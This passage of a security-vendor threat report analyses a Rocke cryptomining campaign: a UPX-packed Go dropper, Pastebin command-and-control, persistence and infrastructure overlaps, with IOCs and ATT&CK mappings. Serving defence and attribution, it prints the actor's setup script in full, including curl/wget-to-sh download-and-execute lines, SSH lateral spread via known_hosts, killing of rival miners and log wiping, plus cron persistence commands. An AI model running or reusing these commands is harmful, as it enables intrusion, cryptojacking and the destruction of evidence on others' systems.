change in the threat actor’s previous tactics.</p><h2>Introduction</h2><p>The threat actor group, Rocke, was first reported by Cisco Talos in August 2018.[1] On January 17th, 2019, Palo Alto Networks’ Unit 42 reported on a campaign conducted by the group that was active in October 2018, in which the group utilized a malware written in Python to orchestrate the infection and spreading of their coinminer.[2] On March 12th, 2019, Anomali Research has, with high confidence, identified a new active campaign that we believe is being conducted by Rocke. The objective of the campaign, similar to other Rocke activity, is to drop a miner onto a machine to mine Monero cryptocurrency. This ongoing campaign has extensive Tactics Techniques and Procedures (TTPs) that overlap with the report published by Unit 42.</p><p>This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious. The low detection rate of the malware coupled with the techniques that prevent the Rocke malicious processes from showing up in the running processes of victim machines, raises the possibility that this campaign has been successfully running for weeks.</p><p style="text-align: center;"><em><img alt="Scanning results from VirusTotal for one of the malware samples" src="https://cdn.filestackcontent.com/iytoepbhR2ywK2oGKU1Q"/><br/> Figure 1: Scanning results from VirusTotal for one of the malware samples.</em></p><h2>Technical Details</h2><h3>Analysis of the Dropper</h3><p>The samples analyzed are packed with UPX. The UPX header has been modified to break the unpacker provided by the UPX project. Instead of having the “UPX!” string, it has been replaced with “LSD!”. Repairing the header is needed to unpack the samples using the unpacker provided by the UPX team.</p><p>The dropper is written in Go (Golang) and the estimated source code structure, based on the decompiler, is shown below:</p><pre> Package main: /root/go/src/github.com/hippies/LSD File: main.go goatt Lines: 12 to 17 (5) main Lines: 17 to 34 (17) /root/go/src/github.com/hippies/LSD/LSDB File: a.go _kBytes Lines: 13 to 27 (14) KWR Lines: 27 to 36 (9) File: b.go _libBytes Lines: 10 to 17 (7) LibWrite Lines: 17 to 25 (8) File: c.go _netdnsinitBytes Lines: 11 to 18 (7) _netdnsserviceBytes Lines: 18 to 26 (8) NetdnsWrite Lines: 26 to 37 (11) /root/go/src/github.com/hippies/LSD/LSDA File: a.go getiplista Lines: 12 to 37 (25) run Lines: 37 to 86 (49) runtwo Lines: 86 to 98 (12) Ago Lines: 98 to 108 (10) (Ago)func1 Lines: 103 to 106 (3) File: b.go getiplistb Lines: 18 to 42 (24) generateTask Lines: 42 to 54 (12) cmd Lines: 54 to 81 (27) (cmd)func1 Lines: 62 to 98 (36) cmdtwo Lines: 81 to 93 (12) bgo Lines: 93 to 113 (20) (bgo)func1 Lines: 98 to 101 (3) Bbgo Lines: 113 to 118 (5) /root/go/src/github.com/hippies/LSD/LSDC File: a.go Read Lines: 17 to 43 (26) PathExists Lines: 43 to 54 (11) CopyFile Lines: 54 to 65 (11) Mkdir Lines: 65 to 69 (4) Writefile Lines: 69 to 79 (10) Writefiletwo Lines: 79 to 88 (9) Delfile Lines: 88 to 97 (9) Changetime Lines: 97 to 105 (8) Cmdexec Lines: 105 to 111 (6) Checkupdate Lines: 111 to 129 (18) Getip Lines: 129 to 149 (20) Getipb Lines: 149 to 164 (15) Cron Lines: 164 to 173 (9)</pre><p>The main execution process can be summarized in the following steps:</p><ol><li>Delete “/etc/ld.so.preload” if it exists</li><li>Get the PID of the process and writes it to “/tmp/.lsdpid”</li><li>Uses “chattr -i” to mark the PID file protected so it cannot be modified</li><li>Copies itself from “/tmp/kthrotlds” to “/usr/sbin/kthrotlds”</li><li>Turns the modified time stamp on the moved file back 416 days</li><li>Installs an “init.d” startup script to “/etc/init.d/netdns” and a systemd service script to “/usr/lib/systemd/system/netdns.service”; the modified time is also changed for these files in the same way</li><li>Enabling the service on the compromised system by executing: “chkconfig --add netdns” and “systemctl enable netdns”</li><li>Removes the files “/tmp/kthrotlds” and “/tmp/kintegrityds”</li><li>Writes code to “/usr/local/lib/libcset.c”</li><li>Compiles it with “gcc /usr/local/lib/libcset.c -Wall -shared -fPIC -ldl -o /usr/local/lib/libcset.so”</li><li>If GCC is not installed it tries to install it and recompile “yum -y install gcc -y||apt-get -y install gcc”</li><li>Adds the path to the shared object to “/etc/ld.so.preload” and protects the file from modifications</li><li>Persistence is added through Cron by executing echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - and by adding “*/15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh” to “/var/spool/cron/crontabs/root”</li><li>Checking for updates by checking the version listed at “https://pastebin.com/raw/HWBVXK6H”</li><li>Installs the Monero miner at “/tmp/kintegrityds” and protects it</li><li>The miner connects to a private pool hosted on DigitalOcean with IP and port of: 134.209.104.20:51640</li></ol><p>The malware also starts an “attack” thread that scans for SSH and Redis servers. The malware uses “ident.me” to determine the machines external host so it does not attack itself.</p><h3>Command and Control</h3><p>The malware uses Pastebin for Command and Control (C2). The URL “https://pastebin[.]com/HWBVXK6H” is used to check for the latest version of the malware. If a new version is available, the malware reaches out to “https://pastebin[.]com/yPRSa0ki”. The paste shown below serves as a redirect to the actual setup stript.</p><pre> (curl -fsSL https://pastebin.com/raw/D8E71JBJ||wget -q -O- https://pastebin.com/raw/D8E71JBJ)|sed 's/ //'|sh</pre><p>The setup script in paste D8E71JBJ, shown below, kills other mining malware and downloads and executes the threat actors’ malware instead. It will also try to use known SSH hosts and the SSH key on the machine to spread latterly.</p><pre> export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin echo "*/10 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh" | crontab - mkdir -p /tmp chmod 1777 /tmp ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9 ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "watchdog"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "watchdogs"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "ksoftirqds"|awk '{print $2}'|xargs kill -9 ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9 ps aux|grep -v grep|grep -v kintegrityds|awk '{if($3&gt;=80.0) print $2}'|xargs kill -9 yum -y install coreutils||apt-get -y install coreutils apt-get install cron -y||yum install crontabs -y||apk add cron -y if [ ! -f "/tmp/.lsdpid" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds else (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds fi nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp; elif [ ! -f "/proc/$(cat /tmp/.lsdpid)/stat" ]; then ARCH=$(uname -m) if [ ${ARCH}x = "x86_64x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060180x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060180x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds elif [ ${ARCH}x = "i686x" ]; then (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds else (curl -fsSL http://sowcar.com/t6/678/1552060225x1822611359.jpg -o /tmp/kthrotlds||wget -q http://sowcar.com/t6/678/1552060225x1822611359.jpg -O /tmp/kthrotlds) &amp;&amp; chmod +x /tmp/kthrotlds fi nohup /tmp/kthrotlds &gt;/dev/null 2&gt;&amp;1 &amp; fi if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp; done fi echo 0&gt;/var/spool/mail/root echo 0&gt;/var/log/wtmp echo 0&gt;/var/log/secure echo 0&gt;/var/log/cron # </pre><p>The Pastebin profile used by the actor for this campaign is shown below. It can be seen that these pastes were added on February 24th, 2019.</p><p style="text-align: center;"><em><img alt="Pastebin profile used by the threat actor" src="https://cdn.filestackcontent.com/ujNmkh1WSJqf7vICOCGn"/><br/> Figure 2: Pastebin profile used by the threat actor</em></p><p>The server hosting the malware has the appearance of a free Chinese image hosting site, shown in Figure 3 below. The page asks a visitor to upload their identity photo for the Chinese online shopping website, Taobao.</p><p style="text-align: center;"><em><img alt="Image hosting site from where the malware is downloaded from" src="https://cdn.filestackcontent.com/DvfNdcNyRlGMU0MbeUCU"/><br/> Figure 3: Image hosting site from where the malware is downloaded from.</em></p><p>According to the Whois record, shown below, the fake image hosting domain was created on June 21st, 2018. It is also registered by the same email (4592248@gmail[.]com) as another domain that was used in an earlier Rocke campaign which indicates that it is likely the site is controlled by the threat group.[3]</p><pre> Domain Name: SOWCAR.COM Registry Domain ID: 2277522871_DOMAIN_COM-VRSN Registrar WHOIS Server: whois.ename.com Registrar URL: http://www.ename.net Updated Date: 2019-03-08T01:38:36Z Creation Date: 2018-06-21T11:14:39Z Registry Expiry Date: 2019-06-21T11:14:39Z Registrar: eName Technology Co., Ltd. Registrar IANA ID: 1331 Registrar Abuse Contact Email: abuse@ename.com Registrar Abuse Contact Phone: 86.4000044400 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Name Server: DALE.NS.CLOUDFLARE.COM Name Server: JOAN.NS.CLOUDFLARE.COM DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: Registry Registrant ID:Not Available From Registry Registrant Name: LuWei Registrant Organization: Lu Wei Registrant Street: SiChuan ZhongLu 668 Hao 8 Lou Registrant City: ShangHai Registrant State/Province: ShangHai Registrant Postal Code: 200000 Registrant Country: CN Registrant Phone: +86.2139003725 Registrant Phone Ext: Registrant Fax: +86.2139003725 Registrant Fax Ext: Registrant Email: 4592248@gmail.com Registry Admin ID:Not Available From Registry</pre><h2>Overlapping TTPs with previous campaigns</h2><p>The current campaign has numerous TTPs overlapping with the previous campaign reported by Unit 42. In both campaigns, the group uses Pastebin for C2 and the C2 system depends on 3 public pastes. One paste serves the latest version, one acts as a redirect to the third that is used to initialize the infection. The redirect uses either “cURL” or “wget” to fetch the initialization script from the paste. The paste is “piped” to either “bash” or “sh” after some cleanup. In addition to the similarities in the structures, the user account names also appear to follow a similar pattern. In this campaign the username is “SYSTEMTEN” while last campaign username was “SYSTEAM”. The first five characters of the username (SYSTE) may be an indication of other Rocke activity.</p><p>The filenames of the payloads are also similar in the two latest reported campaigns. Below are the URLs used to download the payload in this campaign and the campaign reported by Unit 42. The filenames have the same structure, with some of the numbers overlapping.</p><pre> http://sowcar.com/t6/678/1552060180x1822611359.jpg https://master.minerxmr.ru/2/1551434778x2728329032.jpg</pre><p>The malware uses cron for persistence. The similar crontab entries are shown below. The only difference between the entries are the ID of paste used.</p><p>Cron jobs created by the Python version of the malware:</p><pre> "*/10 * * * * root (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##" "*/15 * * * * (curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh ##"</pre><p>Cron jobs created by the Go version of the malware:</p><pre> */10 * * * * root (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ## */15 * * * * (curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh ##</pre><p>In this campaign, the threat actor also uses “init” and “systemd” services for persistence. The name of the service is “netdns.” Below is a snippet from the setup script used by Rocke in a previous campaign that also uses the serviced called netdns. After the file is created, the access and modified time is changed before the file is marked as non-modifiable. The same technique is used by the new malware written in Go.</p><pre> curl -fsSL --connect-timeout 120 https://master.minerxmr.ru/Pep/4 -o /etc/init.d/netdns||wget https://master.minerxmr.ru/Pep/4 -O /etc/init.d/netdns) &amp;&amp; chmod 777 /etc/init.d/netdns &amp;&amp; touch -acmr /bin/sh /etc/init.d/netdns &amp;&amp; chattr +i /etc/init.d/netdns</pre><p>The spreading technique observed by Anomali researchers is the same one used in previous campaigns. The malware in both previous and ongoing campaign assumes that it has root level access on the machine. Below are code snippets from the current campaign and the campaign reported by Unit 42, where the threat actor uses ssh keys and known hosts if they are available to infect other machines.</p><p><strong>Last campaign</strong></p><pre> if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/1NtRkBc3||wget -q -O- https://pastebin.com/raw/1NtRkBc3)|sh' &amp; done fi</pre><p><strong>Current campaign</strong></p><pre> if [ -f /root/.ssh/known_hosts ] &amp;&amp; [ -f /root/.ssh/id_rsa.pub ]; then for h in $(grep -oE "([0-9]{1,3}.){3}[0-9]{1,3}" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/yPRSa0ki||wget -q -O- https://pastebin.com/raw/yPRSa0ki)|sh &gt;/dev/null 2&gt;&amp;1 &amp;' &amp; done fi</pre><p>In addition to the propagation over SSH, the new malware tries to compromise Redis servers just like the Python-based malware.</p><p>There is also overlap of infrastructure. The email used to register the sowcar[.]com domain also registered thyrsi[.]com. This domain was reported on and linked to the same threat group in a report by Cisco Talos in December 2018. The domains registered by this email address is shown in the figure below.</p><p style="text-align: center;"><em><img alt="Domains registered by the same email address" src="https://cdn.filestackcontent.com/Oc8r9TtSyeKfqURLxYoO"/><br/> Figure 4: Domains registered by the same email address.</em></p><h2>Conclusion</h2><p>Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected.</p><h2>Mitre ATT&amp;CK</h2><ul><li>T1190 Exploit Public-Facing Application</li><li>T1078 Valid Accounts</li><li>T1168 Local Job Scheduling</li><li>T1110 Brute Force</li><li>T1222 File Permissions Modification</li><li>T1021 Remote Services</li><li>T1064 Scripting</li><li>T1045 Software Packing</li><li>T1071 Standard Application Layer Protocol</li><li>T1099 Timestomp</li><li>T1055 Process Injection</li><li>T1036 Masquerading</li></ul><h2>IOCs</h2><p><strong>URLS</strong></p><pre> https://pastebin[.]com/raw/yPRSa0ki https://pastebin[.]com/raw/wDBa7jCQ https://pastebin[.]com/raw/D8E71JBJ https://pastebin[.]com/raw/HWBVXK6H https://pastebin[.]com/raw/qs3ger9z http://sowcar[.]com/t6/678/1552060180x1822611359.jpg http://sowcar[.]com/t6/678/1552060225x1822611359.jpg http://sowcar[.]com/t6/682/1552580197x2890211702.jpg</pre><p><strong>SHA256</strong></p><pre> 029e79bc2e232d21b61c09463dd89e515606b7b9df771572627394cbe59e1cbd 93efdee9def596b93517699958e7a5c3f0bae88e220cb08593c4712f143696dd 3a4391293d1a7fbd5cfc34258aa0cfcd57abb8b4453e47ea293c572fbf1862ad 60aadabd2f3f1465f239d2721a663f4b9f9d15e739dcb14df64e241c2d37e30c 9df3ae6da6b262f5dea6a1f5438127cd4cfa8d718997b4e90b107fabb2b392be e2db2dca7d84098192c5562c299a76330ca556ac30d583ac8079fe63b61e94d5</pre><p><strong>Mining pool</strong></p><p>134.209.104.20:51640</p><h2>Endnotes</h2><ul><li>David Liedenberg, “<a href="https://blog.talosintelligence.com/2018/08/rocke-champion-of-monero-miners.html" target="_blank">Rocke: The Champion of Monero Miners</a>,” Talos Blog, accessed March 14, 2019, published August 30, 2018.</li><li>Xingyu Jin and Claud Xiao, “<a href="https://unit42.paloaltonetworks.com/malware-used-by-rocke-group-evolves-to-evade-detection-by-cloud-security-products/" target="_blank">Malware Used by “Rocke” Group Evolves to Evade Detection by Cloud Security Products</a>,” Palo Alto Networks, accessed March 14, 2019, published January 17, 2019.</li><li>David Liebenberg and Andrew Williams, “<a href="https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html" target="_blank">Connecting the dots between recently active cryptominers</a>,” Talos Blog, accessed March 14, 2019, published December 18, 2018.</li></ul>", // Body Content (HTML Markup) "editor": { "@type": "Person", "name": "" // Author #2 (optional) }, "thumbnailUrl": "", // Open Graph Image "commentCount": 0 // Changed to a number type } </script></body></html>